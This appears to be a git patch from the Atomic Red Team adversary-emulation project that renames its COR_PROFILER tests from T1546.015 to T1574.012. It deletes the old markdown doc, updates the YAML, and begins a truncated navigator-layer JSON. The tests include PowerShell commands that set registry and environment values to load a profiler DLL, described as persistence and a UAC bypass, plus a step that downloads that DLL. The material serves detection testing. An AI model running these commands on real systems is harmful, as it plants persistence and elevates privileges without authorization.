 rename atomics/{T1546.015 => T1574.012}/src/atomicNotepad/atomicNotepad.vcxproj (100%)
 rename atomics/{T1546.015 => T1574.012}/src/atomicNotepad/atomicNotepad.vcxproj.filters (100%)
 rename atomics/{T1546.015 => T1574.012}/src/atomicNotepad/atomicNotepad.vcxproj.user (100%)
 rename atomics/{T1546.015 => T1574.012}/src/atomicNotepad/dllmain.cpp (100%)
 rename atomics/{T1546.015 => T1574.012}/src/atomicNotepad/framework.h (100%)
 rename atomics/{T1546.015 => T1574.012}/src/atomicNotepad/pch.cpp (100%)
 rename atomics/{T1546.015 => T1574.012}/src/atomicNotepad/pch.h (100%)
 rename atomics/{T1546.015 => T1574.012}/src/x64/Release/atomicNotepad.dll (100%)

diff --git a/atomics/T1546.015/T1546.015.md b/atomics/T1546.015/T1546.015.md
deleted file mode 100644
index b5705870..00000000
--- a/atomics/T1546.015/T1546.015.md
+++ /dev/null
@@ -1,182 +0,0 @@
-# T1546.015 - Component Object Model Hijacking
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1546.015)
-<blockquote>Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system.(Citation: Microsoft Component Object Model)  References to various COM objects are stored in the Registry. 
-
-Adversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection. </blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - COM Hijack Leveraging user scope COR_PROFILER](#atomic-test-1---com-hijack-leveraging-user-scope-cor_profiler)
-
-- [Atomic Test #2 - COM Hijack Leveraging System Scope COR_PROFILER](#atomic-test-2---com-hijack-leveraging-system-scope-cor_profiler)
-
-- [Atomic Test #3 - COM Hijack Leveraging registry-free process scope COR_PROFILER](#atomic-test-3---com-hijack-leveraging-registry-free-process-scope-cor_profiler)
-
-
-<br/>
-
-## Atomic Test #1 - COM Hijack Leveraging user scope COR_PROFILER
-Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER).
-The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by the Event Viewer process.
-Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity.
-If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however,
-the notepad process will not execute with high integrity.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_name | unmanaged profiler DLL | Path | PathToAtomicsFolder&#92;T1546.015&#92;bin&#92;T1546.015x64.dll|
-| clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c}|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan
-New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null
-New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
-New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
-New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
-Write-Host "executing eventvwr.msc" -ForegroundColor Cyan
-START MMC.EXE EVENTVWR.MSC
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}" -Recurse -Force -ErrorAction Ignore 
-Remove-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null
-Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null
-Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: #{file_name} must be present
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{file_name}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}"
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - COM Hijack Leveraging System Scope COR_PROFILER
-Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect.
-The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity
-level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will
-still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_name | unmanaged profiler DLL | Path | PathToAtomicsFolder&#92;T1546.015&#92;bin&#92;T1546.015x64.dll|
-| clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c}|
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-Write-Host "Creating system environment variables" -ForegroundColor Cyan
-New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
-New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
-New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null
-Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null
-Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: #{file_name} must be present
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{file_name}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}"
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - COM Hijack Leveraging registry-free process scope COR_PROFILER
-Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by PowerShell.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_name | unamanged profiler DLL | Path | PathToAtomicsFolder&#92;T1546.015&#92;bin&#92;T1546.015x64.dll|
-| clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c}|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-$env:COR_ENABLE_PROFILING = 1
-$env:COR_PROFILER = '#{clsid_guid}'
-$env:COR_PROFILER_PATH = '#{file_name}'
-POWERSHELL -c 'Start-Sleep 1'
-```
-
-#### Cleanup Commands:
-```powershell
-$env:COR_ENABLE_PROFILING = 0
-$env:COR_PROFILER = ''
-$env:COR_PROFILER_PATH = ''
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: #{file_name} must be present
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{file_name}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}"
-```
-
-
-
-
-<br/>
diff --git a/atomics/T1546.015/T1546.015.yaml b/atomics/T1574.012/T1574.012.yaml
similarity index 83%
rename from atomics/T1546.015/T1546.015.yaml
rename to atomics/T1574.012/T1574.012.yaml
index 9e507c5d..eee257f7 100644
--- a/atomics/T1546.015/T1546.015.yaml
+++ b/atomics/T1574.012/T1574.012.yaml
@@ -1,21 +1,23 @@
-attack_technique: T1546.015
-display_name: 'Event Triggered Execution: Component Object Model Hijacking'
+attack_technique: T1574.012
+display_name: 'Hijack Execution Flow: COR_PROFILER'
 atomic_tests:
-- name: COM Hijack Leveraging user scope COR_PROFILER
+- name: User scope COR_PROFILER
   auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a
   description: |
     Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER).
-    The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by the Event Viewer process.
+    The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process.
     Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity.
     If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however,
     the notepad process will not execute with high integrity.
+
+    Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
   supported_platforms:
   - windows
   input_arguments:
     file_name:
       description: unmanaged profiler DLL
       type: Path
-      default: PathToAtomicsFolder\T1546.015\bin\T1546.015x64.dll
+      default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
     clsid_guid:
       description: custom clsid guid
       type: String
@@ -28,7 +30,7 @@ atomic_tests:
       if (Test-Path #{file_name}) {exit 0} else {exit 1}
     get_prereq_command: |
       New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
-      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}"
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
   executor:
     command: |
       Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan
@@ -44,20 +46,22 @@ atomic_tests:
       Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null
       Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null
     name: powershell
-- name: COM Hijack Leveraging System Scope COR_PROFILER
+- name: System Scope COR_PROFILER
   auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310
   description: |
     Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect.
-    The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity
+    The unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity
     level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will
     still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.
+
+    Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
   supported_platforms:
   - windows
   input_arguments:
     file_name:
       description: unmanaged profiler DLL
       type: Path
-      default: PathToAtomicsFolder\T1546.015\bin\T1546.015x64.dll
+      default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
     clsid_guid:
       description: custom clsid guid
       type: String
@@ -70,7 +74,7 @@ atomic_tests:
       if (Test-Path #{file_name}) {exit 0} else {exit 1}
     get_prereq_command: |
       New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
-      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}"
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
   executor:
     command: |
       Write-Host "Creating system environment variables" -ForegroundColor Cyan
@@ -83,17 +87,19 @@ atomic_tests:
       Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null
     name: powershell
     elevation_required: true
-- name: COM Hijack Leveraging registry-free process scope COR_PROFILER
+- name: Registry-free process scope COR_PROFILER
   auto_generated_guid: 79d57242-bbef-41db-b301-9d01d9f6e817
   description: |
-    Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by PowerShell.
+    Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell.
+
+    Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
   supported_platforms:
   - windows
   input_arguments:
     file_name:
       description: unamanged profiler DLL
       type: Path
-      default: PathToAtomicsFolder\T1546.015\bin\T1546.015x64.dll
+      default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
     clsid_guid:
       description: custom clsid guid
       type: String
@@ -106,7 +112,7 @@ atomic_tests:
       if (Test-Path #{file_name}) {exit 0} else {exit 1}
     get_prereq_command: |
       New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
-      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}"
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
   executor:
     command: |
       $env:COR_ENABLE_PROFILING = 1
diff --git a/atomics/T1546.015/bin/T1546.015x64.dll b/atomics/T1574.012/bin/T1574.012x64.dll
similarity index 100%
rename from atomics/T1546.015/bin/T1546.015x64.dll
rename to atomics/T1574.012/bin/T1574.012x64.dll
diff --git a/atomics/T1546.015/src/atomicNotepad.sln b/atomics/T1574.012/src/atomicNotepad.sln
similarity index 100%
rename from atomics/T1546.015/src/atomicNotepad.sln
rename to atomics/T1574.012/src/atomicNotepad.sln
diff --git a/atomics/T1546.015/src/atomicNotepad/atomicNotepad.vcxproj b/atomics/T1574.012/src/atomicNotepad/atomicNotepad.vcxproj
similarity index 100%
rename from atomics/T1546.015/src/atomicNotepad/atomicNotepad.vcxproj
rename to atomics/T1574.012/src/atomicNotepad/atomicNotepad.vcxproj
diff --git a/atomics/T1546.015/src/atomicNotepad/atomicNotepad.vcxproj.filters b/atomics/T1574.012/src/atomicNotepad/atomicNotepad.vcxproj.filters
similarity index 100%
rename from atomics/T1546.015/src/atomicNotepad/atomicNotepad.vcxproj.filters
rename to atomics/T1574.012/src/atomicNotepad/atomicNotepad.vcxproj.filters
diff --git a/atomics/T1546.015/src/atomicNotepad/atomicNotepad.vcxproj.user b/atomics/T1574.012/src/atomicNotepad/atomicNotepad.vcxproj.user
similarity index 100%
rename from atomics/T1546.015/src/atomicNotepad/atomicNotepad.vcxproj.user
rename to atomics/T1574.012/src/atomicNotepad/atomicNotepad.vcxproj.user
diff --git a/atomics/T1546.015/src/atomicNotepad/dllmain.cpp b/atomics/T1574.012/src/atomicNotepad/dllmain.cpp
similarity index 100%
rename from atomics/T1546.015/src/atomicNotepad/dllmain.cpp
rename to atomics/T1574.012/src/atomicNotepad/dllmain.cpp
diff --git a/atomics/T1546.015/src/atomicNotepad/framework.h b/atomics/T1574.012/src/atomicNotepad/framework.h
similarity index 100%
rename from atomics/T1546.015/src/atomicNotepad/framework.h
rename to atomics/T1574.012/src/atomicNotepad/framework.h
diff --git a/atomics/T1546.015/src/atomicNotepad/pch.cpp b/atomics/T1574.012/src/atomicNotepad/pch.cpp
similarity index 100%
rename from atomics/T1546.015/src/atomicNotepad/pch.cpp
rename to atomics/T1574.012/src/atomicNotepad/pch.cpp
diff --git a/atomics/T1546.015/src/atomicNotepad/pch.h b/atomics/T1574.012/src/atomicNotepad/pch.h
similarity index 100%
rename from atomics/T1546.015/src/atomicNotepad/pch.h
rename to atomics/T1574.012/src/atomicNotepad/pch.h
diff --git a/atomics/T1546.015/src/x64/Release/atomicNotepad.dll b/atomics/T1574.012/src/x64/Release/atomicNotepad.dll
similarity index 100%
rename from atomics/T1546.015/src/x64/Release/atomicNotepad.dll
rename to atomics/T1574.012/src/x64/Release/atomicNotepad.dll

From d55d047117862458219dee59e2f5c97af3e93d52 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Tue, 18 Aug 2020 17:34:50 +0000
Subject: [PATCH 08/19] Generate docs from job=validate_atomics_generate_docs
 branch=master

---
 .../art-navigator-layer-windows.json          |   2 +-
 .../art-navigator-layer.json                  |   2 +-
 atomics/Indexes/Indexes-CSV/index.csv         |  15 +-
 atomics/Indexes/Indexes-CSV/windows-index.csv |  15 +-
 atomics/Indexes/Indexes-Markdown/index.md     |  25 +-
 .../Indexes/Indexes-Markdown/windows-index.md |  25 +-
 atomics/Indexes/Matrices/matrix.md            |   8 +-
 atomics/Indexes/Matrices/windows-matrix.md    |  10 +-
 atomics/Indexes/index.yaml                    | 629 +++++++++++-------
 atomics/T1574.012/T1574.012.md                | 190 ++++++
 10 files changed, 627 insertions(+), 294 deletions(-)
 create mode 100644 atomics/T1574.012/T1574.012.md

diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
index c0445812..fe518c79 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
@@ -1 +1 @@
-{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.015","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.010","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true}]}
\ No newline at end of file
+{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID"